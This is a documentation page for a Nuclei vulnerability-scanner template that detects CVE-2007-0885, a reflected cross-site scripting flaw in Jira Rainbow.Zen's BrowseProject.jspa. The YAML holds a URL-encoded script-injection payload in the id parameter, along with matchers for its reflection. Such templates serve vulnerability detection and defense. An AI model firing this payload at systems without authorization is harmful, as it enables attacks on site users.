Skip to content
Nuclei Templates

Jira Rainbow.Zen - Cross-Site Scripting

ID: CVE-2007-0885

Severity: medium

Author: geeknik

Tags: cve,cve2007,jira,xss,rainbow_portal

Description

Section titled “Description”

Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2007-0885


info:
  name: Jira Rainbow.Zen - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Jira Rainbow.Zen to mitigate the Cross-Site Scripting vulnerability.
  reference:
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
    - https://nvd.nist.gov/vuln/detail/CVE-2007-0885
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2007-0885
    cwe-id: NVD-CWE-Other
    epss-score: 0.0093
    epss-percentile: 0.82973
    cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rainbow_portal
    product: rainbow.zen
  tags: cve,cve2007,jira,xss,rainbow_portal


http:
  - method: GET
    path:
      - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"><script>alert(document.domain)</script>'


      - type: word
        part: header
        words:
          - "text/html"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d4fd86b114dd20a6cad3c05ed8d6c4466de36e6b243ae9a3734a35c4d06dd38502200cf0ef63629f6a4cfcd848fa4a53f6c7c2eea9f96344eddc2c2749f3f00b4d9b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2007/CVE-2007-0885.yaml"

View on Github